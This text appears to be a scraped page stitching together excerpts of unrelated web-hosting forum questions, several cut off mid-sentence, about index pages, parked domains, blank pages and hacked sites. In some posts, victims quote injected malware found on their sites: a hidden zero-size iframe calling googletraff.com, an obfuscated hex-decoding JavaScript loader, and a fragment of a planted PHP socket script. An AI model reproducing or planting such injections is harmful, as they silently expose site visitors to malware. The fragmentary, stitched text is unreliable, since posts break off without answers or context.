Is it possible to show a default page as the home page of the web site, without setting it as index.html or default.html? This is only on a shared hosting account , so the client does not have access to the apache conf or anything like that.
Here is the site. But, when I move the whole account over to my server, it doesn't show as the home page.
Have a website that is making use of both index.html and index.php files as the main page. How can I achieve either through .htaccess or similar (shared hosting) to have the users directed to index.html and not load the index.php first off.
i have hosted my website on dadicated windows hosting with rackspace. my webiste default page was index.aspx. now i have created new home page with name the of index.html and uploaded this page to server and deleted old home page index.aspx but my new index.html page not showing when i try to open open my website www.example.com but its opening when i try with www.example.com/index.html.
My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.
I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
-I found a index.txt file with links to obscure sites.
The code was written at bottom of the all index.html files: iframe code
Code: ><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ --> Also a line.php with the following code
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?> So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...
I have multiple demo websites under single domain. and in each folder default page is as index.html
few days back i have observed a blank space on each index.html. when i check the code then i have found an auto generated code just after the body tag in index.html. the code is as follows
<div style="visibility:hidden"><iframe src="[url]
Also I am getting Question marks (?) in some blank spaces in HTML preview.
I have removed it but it again appears after some time. I have contacted to server support but they said that this is SQL Injection attack but there is no database connectivity involved in any of my websites.
On a particular host for someone I know, they asked me what this is and I've seen it once before but no one seems to know what it is, why it shows up and how:
Code: </body> </html><script>function v472ef633a10d3(v472ef633a2094){ return(parseInt(v472ef633a2094,16));}function v472ef633a5018(v472ef633a5fe0){ function v472ef633a8f39 () {return 2;} var v472ef633a6faa='';for(v472ef633a7f70=0; v472ef633a7f70<v472ef633a5fe0.length; v472ef633a7f70+=v472ef633a8f39()){ v472ef633a6faa+=(String.fromCharCode(v472ef633a10d3(v472ef633a5fe0.substr(v472ef633a7f70, v472ef633a8f39()))));}return v472ef633a6faa;} document.write(v472ef633a5018('3C5343524950543E77696E6.......etc etc</script> There's another one that starts with:
I created the subdomain for my site www.mysite/myclientpotentialdomain, with the only purpose to show my client the mock up of his home page using his potential domain name. The file is named index.htm and consist only the mock up image.
The problem that I encountered is when I refresh the browser (Firefox) the image disappears. I can see the alt tag, but the picture is gone. Works fine in IE though. The only difference I have noticed that after the refreshment,
One of my customer's domain name's index page is hacked with the pharmacy kind of URLs all over on the homepage. Anyone has idea about this? You can see the URL at [url]
I am using WHMCS and need to upload an index.php per server I wish to monitor. How do I go about doing this so that I can view the page via this method
I changed the dns for a domain I purchased yesterday to a parking service at parked.com
Last night I changed the name servers to my hostgator ones. It worked. I was installing joomla, and publishing the site. Everything was fine when I went to bed.
So I wake up this morning.. now when I go to the site it shows the stupid parked.com parking page instead of what I was working on.
I deleted all the cache, history, temp internet files, cookies, everything.. I tried in firefox, and IE. I tried on two different computers. I can't get my site to load up.
I called hostgator and they said the site is fine and they don't see a park page. They told me just to clear my cache again.
the site is www.wiispecs.com
I would appreciate it if someone could check it out and tell me what site they see. I could use any ideas on how to fix this so I can view the page too.
I tried switching name servers to godaddy and then switching back to hostgator. I also emailed parked.com tech support.
A few days ago i was transferred to a different server within my hosting company. All of my sites remained the same except the only forum i have (phpbb3) now displays a blank page. All the files and database are still intact and nothing has been changed. Any suggestions as to how i would fix this problem? would it be best to backup the database and reinstall a new copy of phpbb?
When I add a new site via New Account in WHM and once the domain resolves, the cPanel 'Great Success' page shows. I have verified the site is resolving properly.
This is a brand new installation and the only changes I have made is I updated apache via WHM.
I started up a brand new site just over a week ago and set the DNS settings to point the domain to my site. It's been that way ever since. Now I try to login today to update my site and see that every url with my domain goes back to the GoDaddy parking page. Is this more a problem with my host, or GoDaddy?
I recently configured a Centos 6.5 server with Java JDK1.8 and the bundled Tomcat server X64 application. I confirmed the web server port is not already in use and also installed the Tomcat APR libraires. The application starts fine and all the logs show no severe errors however when I navigate to te URL I see a blank page. All the configuration files are in tthe correct place and whether I use just :8080 or /licenseserver the page is still blank. If I run the element inspector in the browser it shows 404 file not found.
My one website & all it's sub-domains automatically showing Plesk Default Page . After checking further, I found websites were stopped on the server . I manually started them but after few hours again same status . I repeated the same thing several times but issue not fixed.
There is a page on a separate SharePoint environment, under http://domain.edu/yyy/yyy/yyy/yyy. We have a subdomain called http://123.domain. edu . We need the home page of http://123.domain,edu to point to the SharePoint site, so when users type http://123.domain.edu , they are redirected to http://domain.edu/yyy/yyy/yyy/yyy.
The trick is this - we need all sub-directories NOT to redirect. So, whatever is under http://123.domain.edu/subdirectory should not redirect at all. Is this doable? Also, if it is, I have no clue where to go to make any changes, so any instructions would be great. So far, I have found the text file httpd.conf that I can edit, but I have no clue about the rest.
I have a customer who is having trouble with his account and would like to help him out. He has a VPS from a totally different provider and his Bandwidth usage is 20x normal. In his awstats, the internal page views is showing a huge number of views to totally different domain names such as Yahoo.com etc
Has anyone ever dealt with this before or have any experience with what it is and how to stop it?